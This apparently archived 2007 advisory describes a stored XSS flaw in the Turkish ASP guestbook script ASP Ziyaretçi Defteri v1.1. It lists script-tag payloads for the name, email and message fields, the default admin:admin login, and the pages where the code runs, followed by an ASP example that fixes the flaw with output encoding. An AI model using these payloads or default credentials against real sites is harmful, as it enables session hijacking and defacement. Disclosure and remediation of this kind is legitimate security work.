
aspziy-xss.txt

Posted on 17 July 2007

ASP Ziyaretçi Defteri v1.1 (tr) XSS Vulnerability

#Software: ASP Ziyaretçi Defteri v1.1 (tr)
#download: http://www.aspindir.com/goster/4882
#demo: http://www.hiddenchest.com/kodlarim/ziyaret/
#Found By: GeFORC3 ( G3 )

#Exploit:

1- http://www.example.com/ziyaret/mesaj_formu.asp

Isim: <script>alert("G3");</script>
E-posta: <script>alert("G3");</script>
Mesajiniz: <script>alert("G3");</script>

Press the "Gönder" (send) button.

2- Yönetici paneli (admin panel): http://www.example.com/ziyaret/default.asp
(default user:admin pass:admin) press the "gir" button.

http://www.example.com/default.asp?islem=login --> the XSS code runs

This XSS works in the Yönetici Paneli (admin panel) of the ASP Ziyaretçi Defteri v1.1 (tr) script.

If the admin approves (activates) your message, the XSS code runs on the main page of ASP Ziyaretçi Defteri v1.1 (the guestbook): http://example.com/ziyaret/ziyaretci_mesajlari.asp

WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com
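One way to close the hole described above, as an added example that is not the guestbook's own source: every stored field is HTML-encoded at the point of output, which is the fix needed in both the admin panel listing and the main page. The sample rows, the helper names H and LooksLikeEmail, and the table layout are assumptions.

```asp
<%@ Language="VBScript" %>
<%
Option Explicit
' Added example, not code from ASP Ziyaretci Defteri.
' Constructed sample rows standing in for stored guestbook entries.
' Field order: Isim, E-posta, Mesajiniz (the three form fields in the advisory).
Dim entries(1)
entries(0) = Array("Ayse", "ayse@example.com", "Merhaba!")
entries(1) = Array("<script>alert(""G3"");</script>", _
                   "<script>alert(""G3"");</script>", _
                   "<script>alert(""G3"");</script>")

' HTML-encode a stored value for text or double-quoted attribute context.
' Null-safe, because database columns may be Null.
Function H(value)
    If IsNull(value) Then
        H = ""
    Else
        H = Server.HTMLEncode(CStr(value))
    End If
End Function

' Allowlist check: only turn the e-mail field into a link when it
' looks like an address; anything else is printed as encoded text.
Function LooksLikeEmail(value)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$"
    LooksLikeEmail = re.Test(CStr(value))
End Function

Response.Charset = "utf-8"
Dim i, row
%>
<table>
<% For i = 0 To UBound(entries)
     row = entries(i) %>
  <tr>
    <td><%= H(row(0)) %></td>
    <td><% If LooksLikeEmail(row(1)) Then %>
          <a href="mailto:<%= H(row(1)) %>"><%= H(row(1)) %></a>
        <% Else %>
          <%= H(row(1)) %>
        <% End If %></td>
    <td><%= H(row(2)) %></td>
  </tr>
<% Next %>
</table>
```

Encoding at output rather than only filtering at submission also neutralizes entries that were stored before the fix, in the admin view as well as the public one.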

 
